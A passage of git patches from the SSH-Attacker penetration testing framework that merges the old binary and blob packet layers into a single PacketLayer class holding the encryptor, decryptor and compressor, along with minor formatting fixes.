LayerStack. Custom LayerStack have to be created manually. */ public enum LayerConfiguration { SSHV1, diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index bd31487d0..664b9435b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -16,6 +16,7 @@ import de.rub.nds.sshattacker.core.crypto.kex.RsaKeyExchange; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; +import de.rub.nds.sshattacker.core.layer.impl.PacketLayer; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index 7a487e0d3..c788f2743 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -8,6 +8,7 @@ package de.rub.nds.sshattacker.core.layer.impl; import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.CipherMode; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.PacketLayerType; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; @@ -23,6 +24,14 @@ import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; +import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; +import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; +import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; +import de.rub.nds.sshattacker.core.packet.compressor.PacketDecompressor; +import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketDecryptor; +import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; +import de.rub.nds.sshattacker.core.packet.crypto.PacketDecryptor; +import de.rub.nds.sshattacker.core.packet.crypto.PacketEncryptor; import de.rub.nds.sshattacker.core.packet.parser.AbstractPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; @@ -43,9 +52,26 @@ public class PacketLayer extends ProtocolLayer private static final Logger LOGGER = LogManager.getLogger(); private SshContext context; + private final AbstractPacketDecryptor decryptor; + private final AbstractPacketEncryptor encryptor; + + private final PacketCompressor compressor; + private final PacketDecompressor decompressor; + + private int writeEpoch = 0; + private int readEpoch = 0; + public PacketLayer(SshContext context) { super(ImplementedLayers.PACKET_LAYER); this.context = context; + encryptor = + new PacketEncryptor( + PacketCipherFactory.getNoneCipher(context, CipherMode.ENCRYPT), context); + decryptor = + new PacketDecryptor( + PacketCipherFactory.getNoneCipher(context, CipherMode.DECRYPT), context); + compressor = new PacketCompressor(); + decompressor = new PacketDecompressor(); } @Override @@ -453,4 +479,36 @@ public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) return null; } } + + public PacketCipher getEncryptorCipher() { + return encryptor.getPacketMostRecentCipher(); + } + + public PacketCipher getDecryptorCipher() { + return decryptor.getPacketMostRecentCipher(); + } + + public void resetEncryptor() { + encryptor.removeAllCiphers(); + } + + public void resetDecryptor() { + decryptor.removeAllCiphers(); + } + + public AbstractPacketEncryptor getEncryptor() { + return encryptor; + } + + public AbstractPacketDecryptor getDecryptor() { + return decryptor; + } + + public PacketCompressor getCompressor() { + return compressor; + } + + public PacketDecompressor getDecompressor() { + return decompressor; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketDecryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketDecryptor.java index bd76fb2ca..cfd05f9b2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketDecryptor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketDecryptor.java @@ -18,7 +18,7 @@ public AbstractPacketDecryptor(PacketCipher cipher) { super(cipher); } - public void decrypt(AbstractPacket object) { + public void decrypt(AbstractPacket object) { if (object instanceof BinaryPacket) { decrypt((BinaryPacket) object); } else if (object instanceof BlobPacket) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketEncryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketEncryptor.java index d06b80e42..148814914 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketEncryptor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketEncryptor.java @@ -18,7 +18,7 @@ public AbstractPacketEncryptor(PacketCipher cipher) { super(cipher); } - public void encrypt(AbstractPacket object) { + public void encrypt(AbstractPacket object) { if (object instanceof BinaryPacket) { encrypt((BinaryPacket) object); } else if (object instanceof BlobPacket) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java index d6f2f6dc7..fb7a2b77d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/AbstractPacketHandler.java @@ -11,7 +11,7 @@ import de.rub.nds.sshattacker.core.layer.data.Handler; import de.rub.nds.sshattacker.core.packet.AbstractPacket; -public abstract class AbstractPacketHandler +public abstract class AbstractPacketHandler> implements Handler { protected SshContext sshContext = null; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java index 128ad50ed..f71e813fc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java @@ -82,19 +82,19 @@ public abstract PacketLayerParseResult parsePacket(byte[] rawBytes, int startPos public abstract PacketLayerParseResult parsePacketSoftly(byte[] rawBytes, int startPosition); */ - protected void decryptPacket(AbstractPacket packet) { + protected void decryptPacket(AbstractPacket packet) { packet.prepareComputations(); getDecryptor().decrypt(packet); } - protected void decompressPacket(AbstractPacket packet) { + protected void decompressPacket(AbstractPacket packet) { getDecompressor().decompress(packet); } - public byte[] preparePacket(AbstractPacket packet) { - Preparator preparator = packet.getPreparator(context); + public byte[] preparePacket(AbstractPacket packet) { + Preparator preparator = packet.getPreparator(context); preparator.prepare(); - Serializer serializer = packet.getSerializer(context); + Serializer serializer = packet.getSerializer(context); return serializer.serialize(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java index a79bbfbe5..f550ee91e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java @@ -22,7 +22,7 @@ public BinaryPacketLayer(SshContext context) { } @Override - protected void decryptPacket(AbstractPacket packet) { + protected void decryptPacket(AbstractPacket packet) { if (!(packet instanceof BinaryPacket)) { LOGGER.warn("Decrypting received non binary packet: {}", packet); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/AbstractPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/AbstractPacketParser.java index c629dc441..d499bab3b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/AbstractPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/AbstractPacketParser.java @@ -11,7 +11,7 @@ import de.rub.nds.sshattacker.core.packet.AbstractPacket; import java.io.InputStream; -public abstract class AbstractPacketParser extends Parser { +public abstract class AbstractPacketParser> extends Parser { public AbstractPacketParser(InputStream stream) { super(stream); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/AbstractPacketSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/AbstractPacketSerializer.java index 3b752091e..20cd627b0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/AbstractPacketSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/AbstractPacketSerializer.java @@ -10,4 +10,4 @@ import de.rub.nds.sshattacker.core.layer.data.Serializer; import de.rub.nds.sshattacker.core.packet.AbstractPacket; -public abstract class AbstractPacketSerializer extends Serializer {} +public abstract class AbstractPacketSerializer> extends Serializer {} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthBannerMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthBannerMessage.java index 462b21156..c94164b74 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthBannerMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthBannerMessage.java @@ -8,8 +8,6 @@ package de.rub.nds.sshattacker.core.protocol.authentication.message; import de.rub.nds.modifiablevariable.ModifiableVariableFactory; -import de.rub.nds.modifiablevariable.ModifiableVariableProperty; -import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; import de.rub.nds.sshattacker.core.layer.context.SshContext; @@ -54,7 +52,7 @@ public void setMessage(String message) { } public void setMessage(byte[] message) { - setMessage(new String(message,StandardCharsets.UTF_8), false); + setMessage(new String(message, StandardCharsets.UTF_8), false); } public void setMessage(ModifiableString message, boolean adjustLengthField) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/ChannelManager.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/ChannelManager.java index f52cf6746..9ae366ae4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/ChannelManager.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/ChannelManager.java @@ -48,7 +48,7 @@ private int findUnusedChannelId() { .orElseThrow(); // should never occur with infinite stream } - public void handleChannelOpenMessage(ChannelOpenMessage message) { + public void handleChannelOpenMessage(ChannelOpenMessage message) { final Channel channel = this.createNewChannelFromDefaults(message.getSenderChannelId().getValue()); channel.setChannelType(ChannelType.fromName(message.getChannelType().getValue())); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index b4b87e008..70aa1e199 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -291,8 +291,7 @@ protected void send( new SpecificSendLayerConfiguration<>( ImplementedLayers.SSHV1, protocolMessagesToSend); LayerConfiguration transportConfiguration = - new SpecificSendLayerConfiguration<>( - ImplementedLayers.PACKET_LAYER, packetsToSend); + new SpecificSendLayerConfiguration<>(ImplementedLayers.PACKET_LAYER, packetsToSend); List layerConfigurationList = sortLayerConfigurations( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index 531a72fcd..a136c112f 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -307,7 +307,7 @@ public boolean executedAsPlanned() { // If no expected messages were defined, we consider this receive // action as "let's see what the other side sends". if (expectedMessages.isEmpty()) { - //TODO: Handle for SSH-Attacker + // TODO: Handle for SSH-Attacker // FIXME: In case TLS-Attacker's `GenericReceiveAction` is ported // to SSH-Attacker at some point and the `messages` list is also From cc0d9c52b6c7970f484fd0c9e4474cf2dfd27c0d Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 12 Aug 2023 00:30:04 +0200 Subject: [PATCH 055/176] REV: remove old PacketLayers (Binary and BLOB-Layer) and collect into one PacketLayer --- .../core/layer/context/SshContext.java | 13 +- .../core/layer/impl/PacketLayer.java | 32 +++ .../packet/layer/AbstractPacketLayer.java | 182 ------------------ .../core/packet/layer/BinaryPacketLayer.java | 31 --- .../core/packet/layer/BlobPacketLayer.java | 49 ----- .../core/packet/layer/PacketLayerFactory.java | 28 --- .../packet/layer/PacketLayerParseResult.java | 43 ----- .../action/ChangePacketLayerAction.java | 3 +- 8 files changed, 35 insertions(+), 346 deletions(-) delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BlobPacketLayer.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerFactory.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerParseResult.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index 664b9435b..0dd928271 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -23,8 +23,6 @@ import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; import de.rub.nds.sshattacker.core.packet.crypto.PacketEncryptor; -import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; -import de.rub.nds.sshattacker.core.packet.layer.PacketLayerFactory; import de.rub.nds.sshattacker.core.protocol.connection.Channel; import de.rub.nds.sshattacker.core.protocol.connection.ChannelManager; import de.rub.nds.sshattacker.core.state.Context; @@ -74,8 +72,6 @@ public PacketCipher getActiveDecryptCipher() { /** The currently active packet layer type */ private PacketLayerType packetLayerType; - /** A layer to serialize packets */ - private AbstractPacketLayer packetLayer; /** * If set to true, receive actions will read the incoming byte stream on a per line basis (each * line is terminated by LF). @@ -327,7 +323,6 @@ public void init() { // TODO: Initial packet layer type from config packetLayerType = PacketLayerType.BLOB; - packetLayer = PacketLayerFactory.getPacketLayer(packetLayerType, this); receiveAsciiModeEnabled = true; writeSequenceNumber = 0; readSequenceNumber = 0; @@ -376,12 +371,8 @@ public void setPacketLayerType(PacketLayerType packetLayerType) { this.packetLayerType = packetLayerType; } - public AbstractPacketLayer getPacketLayer() { - return packetLayer; - } - - public void setPacketLayer(AbstractPacketLayer packetLayer) { - this.packetLayer = packetLayer; + public PacketLayer getPacketLayer() { + return (PacketLayer) getContext().getLayerStack().getLayer(PacketLayer.class); } public Boolean isReceiveAsciiModeEnabled() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index c788f2743..3610d4605 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -9,6 +9,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.CipherMode; +import de.rub.nds.sshattacker.core.constants.CompressionAlgorithm; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.PacketLayerType; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; @@ -511,4 +512,35 @@ public PacketCompressor getCompressor() { public PacketDecompressor getDecompressor() { return decompressor; } + + public void updateCompressionAlgorithm(CompressionAlgorithm algorithm) { + compressor.setCompressionAlgorithm(algorithm); + } + + public void updateDecompressionAlgorithm(CompressionAlgorithm algorithm) { + decompressor.setCompressionAlgorithm(algorithm); + } + + public void updateEncryptionCipher(PacketCipher encryptionCipher) { + LOGGER.debug( + "Activating new EncryptionCipher (" + + encryptionCipher.getClass().getSimpleName() + + ")"); + encryptor.addNewPacketCipher(encryptionCipher); + writeEpoch++; + } + + public void updateDecryptionCipher(PacketCipher decryptionCipher) { + LOGGER.debug( + "Activating new DecryptionCipher (" + + decryptionCipher.getClass().getSimpleName() + + ")"); + decryptor.addNewPacketCipher(decryptionCipher); + readEpoch++; + } + + protected void decryptPacket(AbstractPacket packet) { + packet.prepareComputations(); + getDecryptor().decrypt(packet); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java deleted file mode 100644 index f71e813fc..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/AbstractPacketLayer.java +++ /dev/null @@ -1,182 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.packet.layer; - -import de.rub.nds.sshattacker.core.constants.CipherMode; -import de.rub.nds.sshattacker.core.constants.CompressionAlgorithm; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.data.Preparator; -import de.rub.nds.sshattacker.core.layer.data.Serializer; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; -import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; -import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; -import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; -import de.rub.nds.sshattacker.core.packet.compressor.PacketDecompressor; -import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketDecryptor; -import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; -import de.rub.nds.sshattacker.core.packet.crypto.PacketDecryptor; -import de.rub.nds.sshattacker.core.packet.crypto.PacketEncryptor; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public abstract class AbstractPacketLayer { - - private static final Logger LOGGER = LogManager.getLogger(); - - protected final SshContext context; - - private final AbstractPacketDecryptor decryptor; - private final AbstractPacketEncryptor encryptor; - - private final PacketCompressor compressor; - private final PacketDecompressor decompressor; - - private int writeEpoch = 0; - private int readEpoch = 0; - - public AbstractPacketLayer(SshContext context) { - this.context = context; - encryptor = - new PacketEncryptor( - PacketCipherFactory.getNoneCipher(context, CipherMode.ENCRYPT), context); - decryptor = - new PacketDecryptor( - PacketCipherFactory.getNoneCipher(context, CipherMode.DECRYPT), context); - compressor = new PacketCompressor(); - decompressor = new PacketDecompressor(); - } - - /** - * Tries to parse a single packet from rawBytes at startPosition. Due to the nature of SSH - * encryption, this does include decryption of the packet. If this is not possible a Parser - * Exception or Crypto Exception is thrown. - * - * @param rawBytes Bytes to parse - * @param startPosition Start position for parsing - * @return Parse result of the packet layer containing the total number of bytes parsed as well - * as the parsed packet - * @throws ParserException Thrown whenever parsing the provided bytes fails - */ - /* - public abstract PacketLayerParseResult parsePacket(byte[] rawBytes, int startPosition) - throws ParserException, CryptoException; - - */ - /** - * Tries to parse a single packet from rawBytes at startPosition. Due to the nature of SSH - * encryption, this does include decryption of the packet. Exception which might occur are - * handled. - * - *

//@param rawBytes Bytes to parse //@param startPosition Start position for parsing - * - *

//@return Parse result of the packet layer containing the total number of bytes parsed as - * well as the parsed packet - */ - /* - - public abstract PacketLayerParseResult parsePacketSoftly(byte[] rawBytes, int startPosition); - */ - - protected void decryptPacket(AbstractPacket packet) { - packet.prepareComputations(); - getDecryptor().decrypt(packet); - } - - protected void decompressPacket(AbstractPacket packet) { - getDecompressor().decompress(packet); - } - - public byte[] preparePacket(AbstractPacket packet) { - Preparator preparator = packet.getPreparator(context); - preparator.prepare(); - Serializer serializer = packet.getSerializer(context); - return serializer.serialize(); - } - - public void updateCompressionAlgorithm(CompressionAlgorithm algorithm) { - compressor.setCompressionAlgorithm(algorithm); - } - - public void updateDecompressionAlgorithm(CompressionAlgorithm algorithm) { - decompressor.setCompressionAlgorithm(algorithm); - } - - public void updateEncryptionCipher(PacketCipher encryptionCipher) { - LOGGER.debug( - "Activating new EncryptionCipher (" - + encryptionCipher.getClass().getSimpleName() - + ")"); - encryptor.addNewPacketCipher(encryptionCipher); - writeEpoch++; - } - - public void updateDecryptionCipher(PacketCipher decryptionCipher) { - LOGGER.debug( - "Activating new DecryptionCipher (" - + decryptionCipher.getClass().getSimpleName() - + ")"); - decryptor.addNewPacketCipher(decryptionCipher); - readEpoch++; - } - - public PacketCipher getEncryptorCipher() { - return encryptor.getPacketMostRecentCipher(); - } - - public PacketCipher getDecryptorCipher() { - return decryptor.getPacketMostRecentCipher(); - } - - public void resetEncryptor() { - encryptor.removeAllCiphers(); - } - - public void resetDecryptor() { - decryptor.removeAllCiphers(); - } - - public AbstractPacketEncryptor getEncryptor() { - return encryptor; - } - - public AbstractPacketDecryptor getDecryptor() { - return decryptor; - } - - public PacketCompressor getCompressor() { - return compressor; - } - - public PacketDecompressor getDecompressor() { - return decompressor; - } - - public void increaseWriteEpoch() { - writeEpoch++; - } - - public int getWriteEpoch() { - return writeEpoch; - } - - public void setWriteEpoch(int writeEpoch) { - this.writeEpoch = writeEpoch; - } - - public void increaseReadEpoch() { - readEpoch++; - } - - public int getReadEpoch() { - return readEpoch; - } - - public void setReadEpoch(int readEpoch) { - this.readEpoch = readEpoch; - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java deleted file mode 100644 index f550ee91e..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BinaryPacketLayer.java +++ /dev/null @@ -1,31 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.packet.layer; - -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; -import de.rub.nds.sshattacker.core.packet.BinaryPacket; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class BinaryPacketLayer extends AbstractPacketLayer { - - private static final Logger LOGGER = LogManager.getLogger(); - - public BinaryPacketLayer(SshContext context) { - super(context); - } - - @Override - protected void decryptPacket(AbstractPacket packet) { - if (!(packet instanceof BinaryPacket)) { - LOGGER.warn("Decrypting received non binary packet: {}", packet); - } - super.decryptPacket(packet); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BlobPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BlobPacketLayer.java deleted file mode 100644 index 462140a50..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BlobPacketLayer.java +++ /dev/null @@ -1,49 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.packet.layer; - -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class BlobPacketLayer extends AbstractPacketLayer { - - private static final Logger LOGGER = LogManager.getLogger(); - - public BlobPacketLayer(SshContext context) { - super(context); - } - - /* @Override - public PacketLayerParseResult parsePacket(byte[] rawBytes, int startPosition) - throws ParserException { - try { - BlobPacketParser parser = new BlobPacketParser(rawBytes, startPosition); - BlobPacket packet = parser.parse(); - decryptPacket(packet); - decompressPacket(packet); - return new PacketLayerParseResult(packet, parser.getPointer() - startPosition); - } catch (ParserException e) { - throw new ParserException("Could not parse provided data as blob packet", e); - } - } - - @Override - public PacketLayerParseResult parsePacketSoftly(byte[] rawBytes, int startPosition) { - try { - BlobPacketParser parser = new BlobPacketParser(rawBytes, startPosition); - BlobPacket packet = parser.parse(); - decryptPacket(packet); - decompressPacket(packet); - return new PacketLayerParseResult(packet, parser.getPointer() - startPosition, true); - } catch (ParserException e) { - LOGGER.warn("Could not parse provided data as blob packet, dropping remaining bytes"); - return new PacketLayerParseResult(null, rawBytes.length - startPosition, true); - } - }*/ -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerFactory.java deleted file mode 100644 index 69ab3448a..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerFactory.java +++ /dev/null @@ -1,28 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.packet.layer; - -import de.rub.nds.sshattacker.core.constants.PacketLayerType; -import de.rub.nds.sshattacker.core.layer.context.SshContext; - -public class PacketLayerFactory { - - public static AbstractPacketLayer getPacketLayer(PacketLayerType type, SshContext context) { - switch (type) { - case BINARY_PACKET: - return new BinaryPacketLayer(context); - case BLOB: - return new BlobPacketLayer(context); - default: - throw new UnsupportedOperationException( - "Packet layer type '" + type + "' not supported!"); - } - } - - private PacketLayerFactory() {} -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerParseResult.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerParseResult.java deleted file mode 100644 index a3dd042bc..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/PacketLayerParseResult.java +++ /dev/null @@ -1,43 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.packet.layer; - -import de.rub.nds.sshattacker.core.packet.AbstractPacket; -import java.util.Optional; - -public class PacketLayerParseResult { - - private final AbstractPacket parsedPacket; - - private final int parsedByteCount; - - private final boolean softParse; - - public PacketLayerParseResult(AbstractPacket parsedPacket, int parsedByteCount) { - this(parsedPacket, parsedByteCount, false); - } - - public PacketLayerParseResult( - AbstractPacket parsedPacket, int parsedByteCount, boolean softParse) { - this.parsedPacket = parsedPacket; - this.parsedByteCount = parsedByteCount; - this.softParse = softParse; - } - - public Optional getParsedPacket() { - return Optional.ofNullable(parsedPacket); - } - - public int getParsedByteCount() { - return parsedByteCount; - } - - public boolean isSoftParse() { - return softParse; - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ChangePacketLayerAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ChangePacketLayerAction.java index d5aa63ef8..9d321d016 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ChangePacketLayerAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ChangePacketLayerAction.java @@ -11,7 +11,6 @@ import de.rub.nds.sshattacker.core.constants.PacketLayerType; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.layer.PacketLayerFactory; import de.rub.nds.sshattacker.core.state.State; import jakarta.xml.bind.annotation.XmlAttribute; @@ -74,7 +73,7 @@ public void execute(State state) throws WorkflowExecutionException { } SshContext context = state.getSshContext(getConnectionAlias()); context.setPacketLayerType(packetLayerType); - context.setPacketLayer(PacketLayerFactory.getPacketLayer(packetLayerType, context)); + // context.setPacketLayer(PacketLayerFactory.getPacketLayer(packetLayerType, context)); context.setReceiveAsciiModeEnabled(enableAsciiMode); setExecuted(true); } From 13a7ba0f2460a33d627123fb4cc6b5455b28259a Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 12 Aug 2023 00:45:15 +0200 Subject: [PATCH 056/176] REV: Add IANA-Conform 